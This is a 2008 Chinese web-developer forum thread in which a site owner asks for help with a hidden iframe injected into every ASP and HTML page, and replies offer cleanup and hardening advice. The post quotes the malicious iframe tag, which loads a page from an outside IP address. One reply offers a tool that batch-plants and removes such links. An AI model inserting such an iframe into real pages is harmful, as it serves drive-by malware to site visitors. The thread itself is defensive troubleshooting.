28,391
社区成员
发帖
与我相关
我的任务
分享紧急求救 服务器网站都被插入木马
服务器所有 asp html 文件都被插入 <iframe src="http://222.35.136.107/wwwroot/top.asp" width="100" height="0"></iframe>,代码删掉后,重新上传后,访问又出现了
...全文
请发表友善的回复…
发表回复
zjzb0409 2008-10-27
- 打赏
- 举报
最好是断网后 杀毒 重做系统 在杀毒 如果只用网站 开个80端口 以及你需要的服务端口 21 等等 以及将 默认的远程端口3389 改一个 怎么可以上百度收 最后 安装 arp防火墙 金山 还有卡巴斯基里 都有 arp防火墙! 你可以断网后 讲插入的代码删除后 使用本机 localhost 浏览 ! 测试一下 arp 都是需要经过路由器 连网后 才能继续中毒!你在不使用网的情况下 测试下!! 还有就是其他朋友说的 ntfs 权限 能改的 都改为只读吧 如果你服务器权限被人拿了 还是在服务器安全上着手吧!!之前说的 端口 权限 arp防火墙 杀毒软件
Mapleleaf123 2008-10-27
- 打赏
- 举报
自己也用木马,把这段代码清了先。。。
应该是服务器设置得不好~当然代码可能也有洞
应该是服务器设置得不好~当然代码可能也有洞
李睿_Lee 2008-10-27
- 打赏
- 举报
还有,是不是服务器中毒了?查杀一下。
李睿_Lee 2008-10-27
- 打赏
- 举报
看日志,分析原因。找到原因才好对症下药。
zlhran 2008-10-27
- 打赏
- 举报
禁用fso是很不理智的 那意味着所有上传功能都将失效
zlhran 2008-10-27
- 打赏
- 举报
查服务器日志 先找出源头不要急着杀马 先把目录权限除开上传文件文件夹 其他全部设置只读权限 然后杀马
Atai-Lu 2008-10-27
- 打赏
- 举报
呃...
这种没别的办法,只能一个一个文件的查,然后有问题的代码全删,有漏洞的地方都补上...
这种没别的办法,只能一个一个文件的查,然后有问题的代码全删,有漏洞的地方都补上...
Joson.e8love 2008-10-27
- 打赏
- 举报
挂马 本身自己的程序有问题
先解决 掉
其次有 简单方法 可以帮你 css (原理不用怎么说吧 IFRAME script 同样被浏览器看出 html标签 )
在你的 CSS文件里写上
/*<![CDATA[*/
iframe{vs:expression(this.src='about:blank',this.outerHTML='');}
#myiframe{vs:expression() !important} // 解决IFRAME 挂马
script{ngz1:expression((this.src.indexOf('http')==0)?document.close():'');} //解决 js马
/*]]>*/
如果你的页面用来iframe 就要把 你的iframe标签的 name 和Id 这样写
<IFRAME ID="myiframe" name="myiframe" 
wanghui0380 2008-10-27
- 打赏
- 举报
首先是要确定问题。
你需要向服务器管理员提出申请,让他们检查服务器所有站
可以先用文件批替换工具,替换问题页面
然后装上这个文件写监控程序,监控所有写文件操作。一般能有两天就可以在监视日志中找到具体的漏洞页面。
这种东西一定要全服务器处理,一般只要一个站有问题,该服务器所有站都会被挂,所以单纯处理一个站不会有太大作用,也许实际根本就不是你的站的漏洞
你需要向服务器管理员提出申请,让他们检查服务器所有站
可以先用文件批替换工具,替换问题页面
然后装上这个文件写监控程序,监控所有写文件操作。一般能有两天就可以在监视日志中找到具体的漏洞页面。
这种东西一定要全服务器处理,一般只要一个站有问题,该服务器所有站都会被挂,所以单纯处理一个站不会有太大作用,也许实际根本就不是你的站的漏洞
mjjzg 2008-10-26
- 打赏
- 举报
这样看来应该是自动生成的,检查一下可执行文件
superbigbird 2008-10-26
- 打赏
- 举报
能够删除代码,应该不是arp欺骗,第一步,批量删除所有的恶意代码(有很多这样的小工具),第二步,查找服务器的所有文件里的上传目录,看看是否有上传了可执行的其他文件如asp,php等(注意查看某些伪装的图片,比如不能浏览的图片和某些图片的时间和文件格式等)。第三步,限制某些文件夹权限例如上传目录,某些只需要读即可等等。最后当然还可以根据各个网站为服务器设置不同用户的访问权限等等。主要的还是权限问题
lonaerd 2008-10-26
- 打赏
- 举报
兄弟,我曾经遇到和你同样的遭遇。
病毒一般注入index、default、conn 等关键文件,不论是静态和动态,都会写入病毒脚本。
首先,自己写个程序,将网站所有的文件中脚本清除(这个很容易了,文本操作,以关键字开头和结束,稍懂程序的都应该会)。
其次,利用ntfs的功能,加大硬盘访问权限。
最后,将这些index、default、conn 全部设为只读。
(当然,这些工作之前先杀毒)
病毒一般注入index、default、conn 等关键文件,不论是静态和动态,都会写入病毒脚本。
首先,自己写个程序,将网站所有的文件中脚本清除(这个很容易了,文本操作,以关键字开头和结束,稍懂程序的都应该会)。
其次,利用ntfs的功能,加大硬盘访问权限。
最后,将这些index、default、conn 全部设为只读。
(当然,这些工作之前先杀毒)
mnm326 2008-10-26
- 打赏
- 举报
ARP?
如果觉得是服务器入侵,那你检查一下一些可执行文件
如果觉得是服务器入侵,那你检查一下一些可执行文件
loveasp007 2008-10-26
- 打赏
- 举报
重做服务器,网站做基本的防注设置.数据库如果改名为asp的话,连数据库都要重新建一个(把数据移植到新的数据库里)
做了以上这些以后,应该没事了.
做了以上这些以后,应该没事了.
coffee138 2008-10-26
- 打赏
- 举报
是服务器被入侵了的
runtu 2008-10-25
- 打赏
- 举报
我也知道是服务器被入侵了,现在是如何解决了?
Anlige 2008-10-25
- 打赏
- 举报
是服务器被入侵了吧?~~
candata 2008-10-25
- 打赏
- 举报
我感觉还是服务器最重要,禁止FSO是根本之道,我的网站当初也是因为这个原因被google列入"你的网站含有……"而列入黑名单,更毒的是病毒只修改index,conn文件名的,所以禁FSO是最重要的
runtu 2008-10-25
- 打赏
- 举报
谢谢,楼上兄弟
防止SQL注入,我做了不少工作了,网站运行一年多也很正常,可能是工作还不到位,哎
我的邮箱 ngwuxi@126.com
现在主要问题是这种木马的根源在哪?如何彻底得删除
防止SQL注入,我做了不少工作了,网站运行一年多也很正常,可能是工作还不到位,哎
我的邮箱 ngwuxi@126.com
现在主要问题是这种木马的根源在哪?如何彻底得删除
momoco4 2008-10-25
- 打赏
- 举报
额
我以前有个超级木马。。。
可以批量挂马,批量清马,检测木马的。。。
不知道能不能找到。。。
另外你网站肯定有漏洞
导致SQL注入
取得FSO权限并且写入木马连接
呵呵
正常。。。
防下SQL注入就行了
我找找看能不能找到那个超马
找到了给你
留个邮箱吧。。。
我以前有个超级木马。。。
可以批量挂马,批量清马,检测木马的。。。
不知道能不能找到。。。
另外你网站肯定有漏洞
导致SQL注入
取得FSO权限并且写入木马连接
呵呵
正常。。。
防下SQL注入就行了
我找找看能不能找到那个超马
找到了给你
留个邮箱吧。。。
加载更多回复(7)
